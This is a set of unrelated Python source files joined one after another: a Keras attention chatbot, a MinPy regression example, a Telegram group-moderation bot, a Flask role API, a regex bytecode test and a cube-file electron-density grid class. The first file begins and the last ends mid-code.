d_model enc_hidden, fw_h = tf.keras.layers.SimpleRNN(units=d_model, return_sequences=True, return_state=True)(enc_hidden) # bs, n_seq, d_model dec_hidden = embedding(dec_inputs) # bs, n_seq, d_model dec_hidden = tf.keras.layers.SimpleRNN(units=d_model, return_sequences=True)(dec_hidden, initial_state=[fw_h]) # bs, n_seq, d_model attn = DotProductAttention() attn_out = attn((enc_hidden, dec_hidden)) # bs, n_seq, d_model hidden = tf.concat([dec_hidden, attn_out], axis=-1) # bs, n_seq, 2 * d_model outputs = tf.keras.layers.Dense(n_vocab, activation=tf.nn.softmax)(hidden) model = tf.keras.Model(inputs=(enc_inputs, dec_inputs), outputs=outputs) return model # model build model_rnn = build_model_rnn_dot(len(vocab), 256) print(model_rnn.summary()) # complie model_rnn.compile(loss=lm_loss, optimizer=tf.keras.optimizers.Adam(), metrics=[lm_acc]) # early stopping early_stopping = tf.keras.callbacks.EarlyStopping(monitor='lm_acc', patience=10) # save weights save_rnn_dot_file = os.path.join(songys_dir, 'rnn_dot.hdf5') save_weights = tf.keras.callbacks.ModelCheckpoint(save_rnn_dot_file, monitor='lm_acc', verbose=1, save_best_only=True, mode='max', save_freq='epoch', save_weights_only=True) # train history = model_rnn.fit(train_inputs, dec_labels, epochs=500, batch_size=128, callbacks=[early_stopping, save_weights]) def draw_history(history, acc='lm_acc'): """ draw training history :param history: training history object :param acc: acc key """ plt.figure(figsize=(12, 4)) plt.subplot(1, 2, 1) plt.plot(history.history['loss'], 'b-', label='loss') plt.xlabel('Epoch') plt.legend() plt.subplot(1, 2, 2) plt.plot(history.history[acc], 'g-', label=acc) plt.xlabel('Epoch') plt.legend() plt.show() draw_history(history) def do_predict(vocab, model, n_seq, string): """ 응답을 순차적으로 생성 :param vocab: vocab :param model: model object :param n_seq: 시퀀스 길이 (number of sequence) :param string: 입력 문자열 :return response: 입력 문자열에 대한 응답 """ # encoder_tokens = vocab.encode_as_pieces(string) enc_inputs = vocab.encode_as_ids(string)[:n_seq] enc_inputs += [0] * (n_seq - len(enc_inputs)) assert len(enc_inputs) == n_seq # decoder_tokens = ['[BOS]'] dec_inputs = [vocab.bos_id()] dec_inputs += [0] * (n_seq - len(dec_inputs)) response = [] for i in range(n_seq - 1): outputs = model.predict([np.array([enc_inputs]), np.array([dec_inputs])]) prob = outputs[0][i] word_id = int(np.random.choice(len(vocab), 1, p=prob)[0]) if word_id == vocab.eos_id(): break response.append(word_id) dec_inputs[i + 1] = word_id return vocab.decode_ids(response) model_rnn = build_model_rnn_dot(len(vocab), 256) print(model_rnn.summary()) string = '안녕 만나서 반가워' print(do_predict(vocab, model_rnn, n_seq, string)) model_rnn.load_weights(save_rnn_dot_file) print(do_predict(vocab, model_rnn, n_seq, string)) # # bi rnn # def build_model_bi_rnn_dot(n_vocab, d_model): """ bi rnn attention model build :param n_vocab: number of vocab :param d_model: hidden size :return model: model """ enc_inputs = tf.keras.layers.Input((None,)) dec_inputs = tf.keras.layers.Input((None,)) embedding = tf.keras.layers.Embedding(n_vocab, d_model) enc_hidden = embedding(enc_inputs) # bs, n_seq, d_model enc_hidden, fw_h, bw_h = tf.keras.layers.Bidirectional(tf.keras.layers.SimpleRNN(units=d_model, return_state=True))(enc_hidden) # bs, 2 * d_model s_h = tf.concat([fw_h, bw_h], axis=-1) # bs, 2 * d_model dec_hidden = embedding(dec_inputs) # bs, n_seq, d_model dec_hidden = tf.keras.layers.SimpleRNN(units=d_model * 2, return_sequences=True)(dec_hidden, initial_state=[s_h]) # bs, n_seq, 2 * d_model attn = DotProductAttention() attn_out = attn((enc_hidden, dec_hidden)) # bs, n_seq, 2 * d_model hidden = tf.concat([dec_hidden, attn_out], axis=-1) # bs, n_seq, 4 * d_model outputs = tf.keras.layers.Dense(n_vocab, activation=tf.nn.softmax)(hidden) model = tf.keras.Model(inputs=(enc_inputs, dec_inputs), outputs=outputs) return model # model build model_bi_rnn = build_model_bi_rnn_dot(len(vocab), 256) print(model_bi_rnn.summary()) # complie # https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Adam model_bi_rnn.compile(loss=lm_loss, optimizer=tf.keras.optimizers.Adam(), metrics=[lm_acc]) # early stopping early_stopping = tf.keras.callbacks.EarlyStopping(monitor='lm_acc', patience=10) # save weights save_bi_rnn_dot_file = os.path.join(songys_dir, 'bi_rnn_dot.hdf5') save_weights = tf.keras.callbacks.ModelCheckpoint(save_bi_rnn_dot_file, monitor='lm_acc', verbose=1, save_best_only=True, mode='max', save_freq='epoch', save_weights_only=True) # train history = model_bi_rnn.fit(train_inputs, dec_labels, epochs=500, batch_size=128, callbacks=[early_stopping, save_weights]) # history draw_history(history) model_bi_rnn = build_model_bi_rnn_dot(len(vocab), 256) print(model_bi_rnn.summary()) print(do_predict(vocab, model_rnn, n_seq, string)) model_bi_rnn.load_weights(save_bi_rnn_dot_file) print(do_predict(vocab, model_bi_rnn, n_seq, string))
nilq/baby-python
python
#!/usr/bin/python import simple_test simple_test.test("test9", ["-VVV", "-N", "--noise", "-rr", ], expect_fail=True)
nilq/baby-python
python
import minpy import minpy.numpy as np import minpy.numpy.random as random from minpy.core import grad_and_loss # from examples.utils.data_utils import gaussian_cluster_generator as make_data # from minpy.context import set_context, gpu # Please uncomment following if you have GPU-enabled MXNet installed. # This single line of code will run MXNet operations on GPU 0. # set_context(gpu(0)) # set the global context as gpu(0) # Predict the class using multinomial logistic regression (softmax regression). # Because MXNet's implementation does not support mu and sigma to be arrays # (only scalar is supported right now), we need to change the policy for # this function by `@minpy.wrap_policy`or `with minpy.OnlyNumPyPolicy(): ...` """ Generates several clusters of Gaussian points """ def test_policy(): @minpy.wrap_policy("only_numpy") def gaussian_cluster_generator(num_samples=10000, num_features=500, num_classes=5): mu = np.random.rand(num_classes, num_features) sigma = np.ones((num_classes, num_features)) * 0.1 num_cls_samples = int(num_samples / num_classes) x = np.zeros((num_samples, num_features)) y = np.zeros((num_samples, num_classes)) for i in range(num_classes): cls_samples = np.random.normal(mu[i,:], sigma[i,:], (num_cls_samples, num_features)) x[i*num_cls_samples:(i+1)*num_cls_samples] = cls_samples y[i*num_cls_samples:(i+1)*num_cls_samples,i] = 1 return x, y def predict(w, x): a = np.exp(np.dot(x, w)) a_sum = np.sum(a, axis=1, keepdims=True) prob = a / a_sum return prob def train_loss(w, x): prob = predict(w, x) loss = -np.sum(label * np.log(prob)) / num_samples return loss """Use Minpy's auto-grad to derive a gradient function off loss""" grad_function = grad_and_loss(train_loss) # Using gradient descent to fit the correct classes. def train(w, x, loops): for i in range(loops): dw, loss = grad_function(w, x) if i % 10 == 0: print('Iter {}, training loss {}'.format(i, loss)) # gradient descent w -= 0.1 * dw # Initialize training data. num_samples = 10000 num_features = 500 num_classes = 5 data, label = gaussian_cluster_generator(num_samples, num_features, num_classes) # Initialize training weight and train weight = random.randn(num_features, num_classes) train(weight, data, 100) if __name__ == "__main__": test_policy()
nilq/baby-python
python
from .pytorch_sampler import PyTorchSampler from .sampler import Sampler from .unigram import UnigramDistribution from .vocab import Vocabulary
nilq/baby-python
python
import json import os import tempfile from datetime import datetime, timedelta from enum import Enum from itertools import zip_longest, groupby from threading import Timer from typing import Any, List, Optional, Dict, Iterable, Tuple, Set import sentry_sdk from telegram import ParseMode, TelegramError, Update, Message, ChatPermissions from telegram.error import BadRequest from telegram.ext import CallbackContext, Updater from .chat import Chat, User from .decorators import Command from .logger import create_logger def grouper(iterable, n, fillvalue=None) -> Iterable[Tuple[Any, Any]]: """Collect data into fixed-length chunks or blocks""" args = [iter(iterable)] * n return zip_longest(*args, fillvalue=fillvalue) class SpamType(Enum): NONE = 0 CONSECUTIVE = 1 DIFFERENT = 2 SAME = 3 class Bot: def __init__(self, updater: Updater, state_filepath: str): self.logger = create_logger("hhh_diff_bot") self.chats: Dict[int, Chat] = {} self.updater = updater self.main_admin_ids: Set[int] = self._load_main_admin_ids() self.state: Dict[str, Any] = { "group_message_id": [], "recent_changes": [], "hhh_id": -1001473841450, "pinned_message_id": None } self.groups = [] self.state_filepath = state_filepath def _load_main_admin_ids(self) -> Set[int]: raw_value = os.getenv("MAIN_ADMIN_IDS") if not raw_value: self.logger.warning("MAIN_ADMIN_IDS is not set!") return set() try: id_list = json.loads(raw_value) except ValueError as e: self.logger.error("Could not load main admins", exc_info=e) return set() if not isinstance(id_list, list): self.logger.error("MAIN_ADMIN_IDS is not a JSON list") return set() result = set() for main_admin_id in id_list: try: result.add(int(main_admin_id)) except ValueError: self.logger.error("Not a valid user ID: %s", main_admin_id) return result def save_state(self) -> None: self.state["chats"] = [chat.serialize() for chat in self.chats.values()] self.state["groups"] = self.groups with open(self.state_filepath, "w+") as f: json.dump(self.state, f) @Command(chat_admin=True) def delete_chat(self, update: Update, context: CallbackContext) -> None: chat: Chat = context.chat_data["chat"] if chat.id in self.chats: self.logger.info(f"Deleting chat ({chat}) from state.") del self.chats[chat.id] del context.chat_data["chat"] @Command(main_admin=True) def delete_chat_by_id(self, update: Update, context: CallbackContext) -> Optional[Message]: try: chat_id = int(context.args[0]) except (IndexError, ValueError): return update.effective_message.reply_text( text=f"Enter a (valid) chat_id as an argument to use this command.") try: self.chats.pop(chat_id) except KeyError: return update.effective_message.reply_text(text=f"Not a valid chat_id.") def set_user_restriction(self, chat_id: int, user: User, until_date: timedelta, permissions: ChatPermissions, reason: str = None) -> bool: timestamp: int = int((datetime.now() + until_date).timestamp()) try: result: bool = self.updater.bot.restrict_chat_member(chat_id, user.id, permissions, until_date=timestamp) if not permissions.can_send_messages: datestring: str = str(until_date).rsplit(".")[0] # str(timedelta) -> [D day[s], ][H]H:MM:SS[.UUUUUU] message = f"{user.name} has been restricted for {datestring}." if reason: message += f"\nReason: {reason}" self.send_message(chat_id=chat_id, text=message, disable_notification=True) except TelegramError as e: if e.message == "Can't demote chat creator" and not permissions.can_send_messages: message = "Sadly, user {} couldn't be restricted due to: `{}`. Shame on {}".format(user.name, e.message, user.name) self.logger.debug("{}".format(message)) self.send_message(chat_id=chat_id, text=message, parse_mode=ParseMode.MARKDOWN) self.logger.error(e) result = False return result def unmute_user(self, chat_id: int, user: User) -> bool: result = False permissions = ChatPermissions(can_send_messages=True, can_send_media_messages=True, can_send_other_messages=True, can_add_web_page_previews=True) try: # if self.updater.bot.promote_chat_member(chat_id, user.id, can_post_messages=True): if self.set_user_restriction(chat_id, user, timedelta(minutes=0), permissions): user.muted = False result = True else: self.logger.error("Failed to unmute user") except TelegramError: self.logger.error("Error while promoting chat member", exc_info=True) return result def mute_user(self, chat_id: int, user: User, until_date: timedelta, reason: Optional[str] = None) -> bool: if user.muted: return True permissions = ChatPermissions(can_send_messages=False) result = False self.logger.info(f"Reason for muting: {reason}") if self.set_user_restriction(chat_id, user, until_date=until_date, reason=reason, permissions=permissions): user.muted = True result = True # We'd need to parse the exception before assigning user.muted differently def _set_user_unmute(): user.muted = False self.logger.info(f"Set timer for {until_date.total_seconds()}s to set user mute state to `False`") Timer(until_date.total_seconds(), _set_user_unmute).start() return result def update_recent_changes(self, update: str): rc: List[str] = self.state.get("recent_changes", []) if len(rc) > 2: rc.pop() self.state["recent_changes"] = [update] + rc @staticmethod def create_latest_change_text(chat: Chat, new_title: str, delete: bool = False) -> str: change = f"Added {chat.title}" if new_title: change = f"{chat.title} -> {new_title}" elif delete: change = f"Removed {chat.title}" return change def build_hhh_group_list_text(self, prefix: str = "", suffix: str = "") -> List[str]: """ For now, we'll assume that chats starting with the same letter will all fit into a single message :param prefix: Put in front of the constructed text for the groups names :param suffix: Put behind of the constructed text for the groups names :return: List[str] """ def chat_to_item(chat: Chat): try: if chat.invite_link: return f"<a href=\"{chat.invite_link}\">{chat.title}</a>" else: return f"{chat.title}" except AttributeError: return f"{chat.title}" messages = [] message = f"{prefix}\n" if prefix else "" """ Telegram counts the character count after entity parsing. i.e. <a href="https://example.com">A</a> should only be one character We need this for the invite links """ deductable_per_chat = 0 for _, g in groupby( sorted([chat for _, chat in self.chats.items() if chat and chat.title], key=lambda c: c.title.lower()), key=lambda c: c.title[0].lower()): line = " | ".join([chat_to_item(chat) for chat in g]) + "\n" if len(message) + len(line) - deductable_per_chat * len(list(g)) >= 4096: messages.append(message) message = "" message += line if len(message) + len(suffix) >= 4096: messages.append(message) message = "" message += suffix messages.append(message) return messages @property def group_message_ids(self) -> List: """ This is purely for migrative purposes (str -> list) :return: List[str] """ value = self.state.get("group_message_id", []) if not value: return [] elif isinstance(value, str): return [value] else: return value @group_message_ids.setter def group_message_ids(self, value: List[str]): self.state["group_message_id"] = value def delete_message(self, chat_id: str, message_id: str, *args, **kwargs): return self.updater.bot.delete_message(chat_id=chat_id, message_id=message_id, *args, **kwargs) def update_hhh_message(self, chat: Chat, new_title: str = "", delete: bool = False, retry: bool = False): if not retry: latest_change = self.create_latest_change_text(chat, new_title, delete) self.logger.debug(f"Add latest change {latest_change} to recent_changes") self.update_recent_changes(latest_change) if new_title: self.logger.debug(f"Update chat.title ({chat.title}) to {new_title}.") chat.title = new_title self.chats.update({chat.id: chat}) if delete and chat.id in self.chats.keys(): self.chats.pop(chat.id) self.logger.debug(f"Build new group list.") total_group_count_text = f"{len([c for c in self.chats.values() if c.title])} groups in total" changes = "\n".join(["========", "\n".join(self.state["recent_changes"])]) messages = self.build_hhh_group_list_text(prefix=total_group_count_text, suffix=changes) diff = len(messages) - len(self.group_message_ids) if diff > 0: # We have to send more messages than before # -> send a new set of messages since we can't insert one into the conversation self.group_message_ids = [] elif diff < 0: # We have less messages than before # -> delete the unused ones for message_id in self.group_message_ids[-diff:]: try: self.delete_message(self.state["hhh_id"], message_id) except BadRequest as e: self.logger.debug("Exception occured", exc_info=True) pinned = False for index, message_text in enumerate(messages): if not self.group_message_ids or index >= len(self.group_message_ids): self.logger.debug(f"Send {len(messages)} new messages.") message: Message = self.send_message(chat_id=self.state["hhh_id"], text=message_text, parse_mode=ParseMode.HTML) self.group_message_ids = self.group_message_ids + [message.message_id] if not pinned: try: if self.state.get("pinned_message_id"): try: self.updater.bot.unpin_chat_message(chat_id=self.state["hhh_id"], message_id=self.state["pinned_message_id"]) except BadRequest: self.logger.error("Couldn't unpin message", exc_info=True) self.updater.bot.pin_chat_message(chat_id=self.state["hhh_id"], message_id=self.group_message_ids[0], disable_notification=True) self.state["pinned_message_id"] = self.group_message_ids[0] pinned = True except BadRequest: self.logger.error("Couldn't pin the message", exc_info=True) pass else: try: self.logger.debug(f"Edit an old message with the new text ({message_text})") self.updater.bot.edit_message_text(message_text, chat_id=self.state["hhh_id"], message_id=self.group_message_ids[index], disable_web_page_preview=True, parse_mode=ParseMode.HTML) except BadRequest as e: self.logger.exception("Couldn't edit message", exc_info=True) if e.message == "Message to edit not found": self.logger.debug("Try sending a new message") self.group_message_ids = [] return self.update_hhh_message(chat, new_title, delete, retry=True) @Command() def handle_message(self, update: Update, context: CallbackContext) -> None: self.logger.info("Handle message: {}".format(update.effective_message.text)) @Command() def handle_left_chat_member(self, update: Update, context: CallbackContext) -> None: chat: Chat = context.chat_data["chat"] if update.effective_message.left_chat_member.id != self.updater.bot.id: try: user: User = [user for user in chat.users if user.id == update.effective_message.left_chat_member.id][0] except IndexError: self.logger.error("Couldn't find user in chat") else: chat.users.remove(user) else: self.update_hhh_message(chat, "", delete=True) context.chat_data.clear() def set_state(self, state: Dict[str, Any]) -> None: self.state = state self.chats = {schat["id"]: Chat.deserialize(schat, self.updater.bot) for schat in state.get("chats", [])} def send_message(self, *, chat_id: int, text: str, **kwargs) -> Message: return self.updater.bot.send_message(chat_id=chat_id, text=text, disable_web_page_preview=True, **kwargs) def _get_chat_by_title(self, title: str) -> Optional[Chat]: for chat in self.chats.values(): if title == chat.title: return chat return None @Command() def show_users(self, update: Update, context: CallbackContext) -> Optional[Message]: from_chat: Chat = context.chat_data["chat"] if context.args: search_title = " ".join(context.args).strip() chat: Optional[Chat] = self._get_chat_by_title(search_title) if not chat: return self.send_message(chat_id=from_chat.id, text="This chat doesn't exist") else: chat = from_chat sorted_users: List[User] = sorted(chat.users, key=lambda _user: _user.name) if sorted_users: message = "\n".join([user.name for user in sorted_users]) else: message = "No active users. Users need to write a message in the chat to be recognized (not just a command)" return self.send_message(chat_id=from_chat.id, text=message) @Command() def new_member(self, update: Update, context: CallbackContext) -> None: chat = context.chat_data["chat"] self.logger.info(f"New member(s) have joined this chat") for member in update.effective_message.new_chat_members: if member.id != self.updater.bot.id: chat.users.add(User.from_tuser(member)) else: try: self.update_hhh_message(context.chat_data["chat"], "") except BadRequest: self.logger.exception("Failed to update message", exc_info=True) self.send_message(chat_id=self.state["hhh_id"], text=f"Created {update.effective_chat.title}") @Command() def status(self, update: Update, context: CallbackContext) -> Message: return update.effective_message.reply_text(text=f"{context.chat_data['chat']}") @Command() def version(self, update: Update, context: CallbackContext) -> Message: return update.effective_message.reply_text("{{VERSION}}") @Command() def server_time(self, update: Update, context: CallbackContext) -> Message: return update.effective_message.reply_text(datetime.now().strftime("%d-%m-%Y %H-%M-%S")) @Command() def get_data(self, update: Update, context: CallbackContext) -> Message: chat: Chat = context.chat_data["chat"] data = [_chat for _chat in self.state.get("chats", []) if _chat.get("id") == chat.id] if data: with tempfile.TemporaryFile() as temp: temp.write(json.dumps(data[0]).encode("utf-8")) temp.seek(0) return self.updater.bot.send_document(chat_id=chat.id, document=temp, filename=f"{chat.title}.json") else: return update.effective_message.reply_text("Couldn't find any data for this chat.") @Command(chat_admin=True) def mute(self, update: Update, context: CallbackContext): if not context.args: message = "Please provide a user and an optional timeout (`/mute <user> [<timeout in minutes>] [<reason>]`)" self.logger.warning("No arguments have been provided, don't execute `mute`.") return self.send_message(chat_id=update.message.chat_id, text=message, parse_mode=ParseMode.MARKDOWN) username = context.args[0] minutes = 15 reason = " ".join(context.args[2:]) try: minutes = int(context.args[1]) except (IndexError, ValueError): sentry_sdk.capture_exception() self.logger.error("Exception while getting time string from mute command", exc_info=True) mute_time = timedelta(minutes=minutes) chat = context.chat_data["chat"] try: user = next(filter(lambda x: x.name == username, chat.users)) except StopIteration: sentry_sdk.capture_exception() self.logger.warning(f"Couldn't find user {username} in users for chat {update.message.chat_id}", exc_info=True) update.effective_message.reply_text(f"Can't mute {username} (not found in current chat).") else: self.mute_user(update.message.chat_id, user, until_date=mute_time, reason=reason) @Command(chat_admin=True) def unmute(self, update: Update, context: CallbackContext): if not context.args: message = "You have to provide a user which should be unmuted." self.logger.warning("No arguments have been provided, don't execute `unmute`.") return update.effective_message.reply_text(message, parse_mode=ParseMode.MARKDOWN) username: str = context.args[0].strip() chat: Chat = context.chat_data["chat"] # @all is an unusable username if username == "@all": for user in chat.users: try: self.unmute_user(chat.id, user) except BadRequest: self.logger.error(f"Failed to unmute user ({user})") return try: user = next(filter(lambda x: x.name.lower() == username.lower(), chat.users)) except StopIteration: sentry_sdk.capture_exception() self.logger.warning(f"Couldn't find user {username} in users for chat {update.message.chat_id}", exc_info=True) update.effective_message.reply_text(f"Can't unmute {username} (not found in current chat).") else: if self.unmute_user(chat.id, user): update.effective_message.reply_text(f"Successfully unmuted {username}.") else: update.effective_message.reply_text(f"Failed to unmute {username}.") @Command() def handle_unknown_command(self, update: Update, context: CallbackContext): user: User = context.user_data["user"] chat: Chat = context.chat_data["chat"] reason = "This is not a valid command fuckwit." self.mute_user(chat_id=chat.id, user=user, until_date=timedelta(minutes=15), reason=reason) def kick_user(self, chat: Chat, user: User): return self.updater.bot.kick_chat_member(chat_id=chat.id, user_id=user.id) @Command(chat_admin=True) def kick(self, update: Update, context: CallbackContext): chat: Chat = context.chat_data["chat"] if not context.args: message = "Please provide a user and an optional reason(`/kick <user> [<reason>]`)" self.logger.warning("No arguments have been provided, don't execute `kick`.") return update.message.reply_text(text=message, parse_mode=ParseMode.MARKDOWN) username = context.args[0] reason = " ".join(context.args[1:]) try: user: User = next(filter(lambda x: x.name == username, chat.users)) except StopIteration: sentry_sdk.capture_exception() self.logger.warning(f"Couldn't find user {username} in users for chat {update.message.chat_id}", exc_info=True) update.effective_message.reply_text(f"Can't kick {username} (not found in current chat).") else: try: result = self.kick_user(chat, user) except TelegramError as e: message = f"Couldn't remove {user.name} from chat due to error ({e})" self.logger.error(message) update.message.reply_text(message) else: if result: message = f"{user.name} was kicked from chat" message += f" due to {reason}." if reason else "." self.logger.debug(message) chat.users.remove(user) update.message.reply_text(message) else: message = f"{user.name} couldn't be kicked from chat" self.logger.warning(message) update.effective_message.reply_text(message) @Command() def new_chat_title(self, update: Update, context: CallbackContext): chat: Chat = context.chat_data["chat"] new_title = update.effective_message.new_chat_title self.update_hhh_message(chat, new_title) @Command() def chat_created(self, update: Update, context: CallbackContext): try: self.update_hhh_message(context.chat_data["chat"], "") except BadRequest: self.logger.exception("Failed to update message", exc_info=True) self.send_message(chat_id=self.state["hhh_id"], text=f"Created {update.effective_chat.title}") @Command(chat_admin=True) def add_invite_link(self, update: Update, context: CallbackContext): chat: Chat = context.chat_data["chat"] if context.args: invite_link: str = context.args[0] else: return update.effective_message.reply_text("Provide an invite link moron") if _validate_invite_link(invite_link): chat.invite_link = invite_link if update.effective_message.reply_text("Added (new) invite link"): self.update_hhh_message(context.chat_data["chat"], "", retry=True) else: return update.effective_message.reply_text( "invite link isn't in a correct form (tg://join?invite=[...] | https://t.me/joinchat/[...] | t.me/[...]") @Command() def get_invite_link(self, update: Update, context: CallbackContext): if context.args: group_name: str = " ".join(context.args) else: return update.effective_message.reply_text("Provide a group name moron") try: chat: Chat = [c for c in self.chats.values() if c.title == group_name][0] except IndexError: return update.effective_message.reply_text("I don't know that group") if chat.invite_link: return update.effective_message.reply_text(chat.invite_link) else: return update.effective_message.reply_text("No invite link found for the given group") @Command(chat_admin=True) def remove_invite_link(self, update: Update, context: CallbackContext): chat: Chat = context.chat_data["chat"] chat.invite_link = None self.update_hhh_message(context.chat_data["chat"], "", retry=True) @Command() def migrate_chat_id(self, update: Update, context: CallbackContext): self.logger.debug(f"Migrating {update.effective_message}") if not update.effective_message.migrate_from_chat_id: self.logger.warning("Aborting migration since `migrate_from_chat_id` is unset, see #49") return None from_id = int(update.effective_message.migrate_from_chat_id) to_id = int(update.effective_message.chat.id) self.logger.debug(f"Update chat_id to {to_id} (was: {from_id})") new_chat = context.chat_data["chat"] new_chat.id = to_id context.chat_data["chat"] = new_chat self.chats[to_id] = new_chat self.chats.pop(from_id) @Command() def renew_diff_message(self, update: Update, context: CallbackContext): self.group_message_ids = [] # retry doesn't update the recent changes self.update_hhh_message(context.chat_data["chat"], "", retry=True) def me(self): return self.updater.bot.get_me() @Command() def noop(self, update: Update, context: CallbackContext): self.logger.debug(update) pass def _split_messages(lines): message_length = 4096 messages = [] current_length = 0 current_message = 0 for line in lines: if len(messages) <= current_message: messages.append([]) line_length = len(line) if current_length + line_length < message_length: current_length += line_length messages[current_message].append(line) else: current_length = 0 current_message += 1 return messages def _validate_invite_link(link: str) -> bool: import re if re.match(r"https://t.me/(joinchat/)?.*", link): return True m = re.match(r"tg://join\?invite=.*", link) b = bool(m) return b
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright © 2007 Free Software Foundation, Inc. <https://fsf.org/> # # Licensed under the GNU General Public License, version 3 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://jxself.org/translations/gpl-3.zh.shtml # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import time import uuid from sfo_server import access_logger from sfo_server.models import SfoServerRole,db, SfoServerPermission from flask_restful import Resource,request,abort,fields,marshal_with from sfo_server.decorate import access_log_decorate,permission_required, login_required from sfo_server.resource.common import timestamp_format rolelist_resource_fields = { "status": fields.String, "message": fields.String, "data": fields.List(fields.Nested({ "role_name": fields.String, "add_time": fields.String, "last_modify_time": fields.String, "role_desc": fields.String })) } def get_role_list(): status = '' message = '' data = [] resp = {"status": status, "message": message, "data": data} sfo_server_rolelist = SfoServerRole.query.all() if sfo_server_rolelist: data = sfo_server_rolelist status = 200 message = 'SUCCESS' else: status = 404 message = 'Not Found Record' resp.update({"status": status, "message": message, "data":data}) return resp, status def add_role_logic(role_json): """ :param role_json: :return: """ status = '' message = '' resp = {"status": status, "message": message} new_role = SfoServerRole() try: if role_json: for key, value in role_json.items(): if hasattr(new_role, key): if key == 'permissions': value = SfoServerPermission.query_permissions(value) setattr(new_role, key, value) new_role.guid = str(uuid.uuid4()) new_role.add_time = new_role.last_modify_time = timestamp_format(time.time()) db.session.add(new_role) db.session.commit() status = 200 message = 'SUCCCESS' else: status = 501 message = 'Null Value %s' % role_json except Exception, ex: status = 502 message = str(ex) resp.update({"status": status, "message": message}) return resp, status class SfoServerRoleListAPI(Resource): resource = SfoServerRole method_decorators = [permission_required(resource), login_required] @marshal_with(rolelist_resource_fields) def get(self): try: resp, status = get_role_list() return resp, status except Exception, ex: status = 500 message = str(ex) return {'status': status, "message": message}, status def post(self): try: if not request.json: abort(400) role_json = request.json resp, status = add_role_logic(role_json) return resp, status except Exception, ex: status = 500 message = str(ex) return {'status': status, "message": message}, status
nilq/baby-python
python
# # Copyright (c) 2017-2018 Joy Diamond. All rights reserved. # __import__('Boot').boot() def line(format, *args): print format % args def main(): if 0: from Pattern import make_match_function joy_match = make_match_function('[Aa](m)i(?P<what>t)\Z') else: import _sre joy_match = _sre.compile( None,#'[Aa](m)i(?P<what>t)\\Z', 0, [ 17, 9, 4, 4, 4, 19, 65, 19, 97, 0, 15, 6, 19, 65, 19, 97, 0, 21, 0, 19, 109, 21, 1, 19, 105, 21, 2, 19, 116, 21, 3, 6, 7, 1, ], 2, {'what': 2}, ((None, None, 'what')), ).match m = joy_match('Joy') print m.group(0, 1, 2)
nilq/baby-python
python
# -*- coding: utf-8 -*- """ Created on Wed Jul 20 15:12:49 2016 @author: uzivatel """ import numpy as np import scipy from functools import partial from copy import deepcopy from .general import Coordinate,Grid from ...General.UnitsManager import PositionUnitsManaged,position_units from ...General.types import UnitsManaged from ..positioningTools import RotateAndMove, RotateAndMove_1, CenterMolecule class DensityGrid(PositionUnitsManaged): ''' Class representing electronic density on spatial grid (e.g. molecular orbitals, transition density, ...) origin : numpy.array of real (dimension 3) origin of density grid (Position managed units) grid : numpy.array of integer (dimension 3) number of grid points at each dimension step : numpy.array of real (dimension 3x3) step[i,:] translational vector in first dimension (Position managed units) data : numpy.array of real (dimension Npoints_x x Npoints_y x Npoints_z) Density values on the grid. data[i,j,k] correspond to the point with coordinates self.origin+i*self.step[0,:]+j*self.step[1,:]+kk*self.step[2,:] type : string If ``typ='mo'`` density values correspond to real wavefunction otherwise it is an electron density indx : integer Index of molecular orbital to which wavefunction correspond coor : Coordinate class Atomic coordinates for every atom in the molecule or complex. (Position managed units) at_charge : numpy array of real, integer or string (dimension Natoms) Proton number for every atom in the molecule or complex Functions ---------- rotate : Rotate the density and all its properties by specified angles in radians in positive direction. rotate_1 : Inverse totation to rotate move : Moves the density and all its properties along specified vector center : Center the density and allign in defined plane copy : Create 1 to 1 deep copy of the density with all classes and types. import_cub : Read density from cube file output : Outputs density into cube file get_axes : Outputs x, y and z axis of the grid on which density is evaluated (only for nonrotated grid - oriented along coordinate axis) copy : Create 1 to 1 deep copy of the density with all classes and types. dipole : Numerical calculation of dipole from the density dipole_partial : Numerical calculation of dipole for only specified spatial cut of the density. (only for nonrotated grid - oriented along coordinate axis) cut : Spatial cut of the density which is outputed as a new density. (only for nonrotated grid - oriented along coordinate axis) calc_atomic_properties : Calculate atomic charges and dipoles from numerical integration of the density into individual atoms. Quantity from grid point will be assigned to nearest atom. ''' origin=UnitsManaged("origin") step=UnitsManaged("step") def __init__(self,origin,grid,step,density,typ='mo',mo_indx=1,Coor=None,At_charge=None): if origin is None: self.origin=None else: self.origin = np.copy(origin) if grid is None: self.grid=None else: self.grid = np.copy(grid) if step is None: self.step=None else: self.step = np.copy(step) if density is None: self.data=None else: self.data = np.copy(density) self.type = typ self.indx = mo_indx if Coor is None: self.coor=None else: self.coor = Coordinate(Coor) self.at_charge = np.copy(At_charge) def output(self,filename='density.cub'): ''' Output density to cube file Parameters ---------- filename : string (optional - init='density.cub') Output file name including the path to output folder ''' with position_units('Bohr'): Coor = np.copy(self.coor.value) Grid = np.copy(self.grid) Step = np.copy(self.step) At_charge = np.copy(self.at_charge) with open(filename, "wt") as f: # Vypis hlavicky f.write("____Zde muze byt napsano cokoliv____ \n MO coefficients \n") # f.write(" %i %5.2f %5.2f %5.2f \n" % (-len(qc.at_coord),min_[0],min_[1],min_[2])) if self.type=='mo': f.write("{:5d}".format(-len(Coor))) else: f.write("{:5d}".format(len(Coor))) for ii in range(3): f.write("{:12.6f}".format(self.origin[ii])) f.write("{:5d}\n".format(1)) f.write("{:5d}{:12.6f}{:12.6f}{:12.6f}\n".format(Grid[0], Step[0,0], Step[0,1], Step[0,2] )) f.write("{:5d}{:12.6f}{:12.6f}{:12.6f}\n".format(Grid[1], Step[1,0], Step[1,1], Step[1,2] )) f.write("{:5d}{:12.6f}{:12.6f}{:12.6f}\n".format(Grid[2], Step[2,0], Step[2,1], Step[2,2] )) for ii in range(len(Coor)): f.write("{:5d}{:12.6f}{:12.6f}{:12.6f}{:12.6f}\n".format(int(float(At_charge[ii])), float(At_charge[ii]), Coor[ii,0], Coor[ii,1], Coor[ii,2])) if self.type=='mo': f.write("{:5d}{:5d}\n".format(1, self.indx)) # vypis molekuloveho orbitalu na gridu for ii in range(self.grid[0]): for jj in range(self.grid[1]): for kk in range(self.grid[2]): f.write("{:13.5E}".format(self.data[ii,jj,kk])) if (kk % 6) == 5: f.write("\n") #f.write("\n") if 